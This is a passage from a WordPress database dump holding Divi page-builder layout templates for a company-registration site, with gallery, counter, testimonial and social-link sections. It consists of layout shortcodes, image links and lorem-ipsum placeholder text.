custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Jump start</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_thumb2.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"center\" force_fullwidth=\"on\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Make it amazing</p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#818890\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\r\n\r\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"0px||104px|\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"0px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Call To Action\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\" button_url=\"#\" button_text=\"START NOW\" custom_margin=\"0px|||\"]\r\n\r\n\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Collections','','publish','closed','closed','','ask-more-of-your-stock-images','','','2016-05-27 19:44:32','2016-05-27 17:44:32','',0,'https://companyregistration.online/et_pb_layout/ask-more-of-your-stock-images/',0,'et_pb_layout','',0),(5739,1,'2016-05-27 19:44:41','2016-05-27 17:44:41','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"780px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Gallery\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Gallery</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Control your photos.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Control your photos.</span></p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.5em\" custom_margin=\"24px|||\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p>Yes, I’m a dummy text. Anyway I look nice and useful in some ways. Thanks. I know also latin. Lorem ipsum sit amet is my favourite concept.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"40px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" gutter_width=\"2\" parallax_2=\"off\" parallax_method_2=\"off\"][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/12.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"off\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/13.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"32px|||\" custom_padding_last_edited=\"on|phone\" custom_padding_tablet=\"12px|||\" custom_padding_phone=\"0px|||\"][et_pb_column type=\"4_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/14.jpg\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"0px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"0px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Call To Action\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"520px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\" button_url=\"#\" button_text=\"VIEW MORE\" custom_margin=\"0px|||\"]\n\n\n\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Gallery','','publish','closed','closed','','gallery','','','2016-05-27 19:44:41','2016-05-27 17:44:41','',0,'https://companyregistration.online/et_pb_layout/gallery/',0,'et_pb_layout','',0),(5740,1,'2016-05-27 19:45:01','2016-05-27 17:45:01','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header 5\" title=\"Great images should be shared.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Header #5','','publish','closed','closed','','great-images-should-be-shared','','','2016-05-27 19:45:01','2016-05-27 17:45:01','',0,'https://companyregistration.online/et_pb_layout/great-images-should-be-shared/',0,'et_pb_layout','',0),(5741,1,'2016-05-27 19:45:11','2016-05-27 17:45:11','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#212a35\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"28px||28px|\" custom_padding_last_edited=\"on|tablet\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"2246\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\n\n\n\n[/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"847\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\n\n\n\n[/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_number_counter admin_label=\"Number Counter\" title=\"Numbers\" number=\"5623\" percent_sign=\"off\" counter_color=\"#7EBEC5\" background_layout=\"light\" title_font=\"Roboto||||\" title_font_size=\"24\" title_text_color=\"#ffffff\" title_line_height=\"1.1em\" number_font=\"Roboto||||\" number_text_color=\"#00bcd4\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;||text-align:left;\" custom_css_number_counter_title=\"font-weight:400;\"]\n\n\n\n[/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section]','Number Counter','','publish','closed','closed','','number-counter','','','2016-05-27 19:45:11','2016-05-27 17:45:11','',0,'https://companyregistration.online/et_pb_layout/number-counter/',0,'et_pb_layout','',0),(5744,1,'2016-05-27 19:45:39','2016-05-27 17:45:39','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-top: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"104px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Testimonials\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#909394\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Testimonials</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Trusted and used by many big companies.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Trusted and used by many big companies.</span></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"58px||104px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" parallax_2=\"off\" parallax_method_2=\"off\" custom_width_px=\"860px\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>\"I use Testimonial Generator often. Great job, I will definitely be ordering again! I\'m good to go. \"</p>\n\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"36px||0px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"12px||0px|\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" text_font_size=\"18\" text_line_height=\"1.4em\"]\n\n<p>Rick F.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" custom_margin=\"||40px|\"]\n\n<p>Designer at Ciao</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>\"Fantastic, I\'m totally blown away by Testimonial Generator. I’ll use it again! I’m cool and you know it.\"</p>\n\n[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/008.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"36px||0px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"12px||0px|\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\" text_font_size=\"18\" text_line_height=\"1.4em\"]\n\n<p>Mark A.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_text_color=\"#5b666d\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_css_main_element=\"font-weight:400;\" text_font=\"Roboto||||\"]\n\n<p>Visual artist</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Testimonials','','publish','closed','closed','','testimonials','','','2016-05-27 19:45:39','2016-05-27 17:45:39','',0,'https://companyregistration.online/et_pb_layout/testimonials/',0,'et_pb_layout','',0),(5745,1,'2016-05-27 19:46:00','2016-05-27 17:46:00','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"20px||40px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" column_padding_mobile=\"on\" custom_padding_phone=\"0px|||\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Find quick\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" alt=\"03\" width=\"40\" height=\"40\">Find quick</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Find quick\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" alt=\"03\" width=\"40\" height=\"40\">Jump start</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_text admin_label=\"Make it amazing\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#262e32\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p><img style=\"float: left;margin: -5px 15px 2px 0px\" class=\"size-full wp-image-4662\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-1.png\" alt=\"03\" width=\"40\" height=\"40\">Make it amazing</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"18\" text_text_color=\"#5b666d\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\" custom_css_main_element=\"font-weight: 400;\"]\n\n<p>Lorem ipsum dolor sit amet, consecter adipiscing elit. Aenean commodo ligula eget dolor. Cum soclis orestem.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Step By Step','','publish','closed','closed','','step-by-step','','','2016-05-27 19:46:00','2016-05-27 17:46:00','',0,'https://companyregistration.online/et_pb_layout/step-by-step/',0,'et_pb_layout','',0),(5746,1,'2016-05-27 19:46:11','2016-05-27 17:46:11','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f8fa\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_css_main_element=\"border-bottom: 1px solid #D7DCE1;\" disabled_on=\"off|off|off\" disabled=\"off\" template_type=\"section\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"620px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"30px|||\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Stay tuned.\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto Light||||\" text_font_size=\"56\" text_text_color=\"#262e32\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_css_main_element=\"font-weight: 300;\"]\n\n<p class=\"p1\"><span class=\"s1\">Stay tuned.</span></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"20px||30px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" parallax_2=\"off\" parallax_method_2=\"off\" custom_width_px=\"860px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p><a href=\"#\"><img class=\"alignnone size-full wp-image-5034\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/facebook.png\" alt=\"facebook\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/instagram.png\"><img class=\"alignnone size-medium wp-image-5035\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/instagram.png\" alt=\"instagram\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/twitter.png\"><img class=\"alignnone size-medium wp-image-5036\" style=\"margin-right: 2%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/twitter.png\" alt=\"twitter\" width=\"102\" height=\"102\" /></a><a href=\"https://companyregistration.online/wp-content/uploads/2016/07/rss-1.png\"><img class=\"alignnone size-medium wp-image-5037\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/rss-1.png\" alt=\"rss\" width=\"102\" height=\"102\" /></a></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Social Links','','publish','closed','closed','','social-links','','','2016-05-27 19:46:11','2016-05-27 17:46:11','',0,'https://companyregistration.online/et_pb_layout/social-links/',0,'et_pb_layout','',0),(5747,1,'2016-05-27 19:46:40','2016-05-27 17:46:40','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/bg_footer.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" 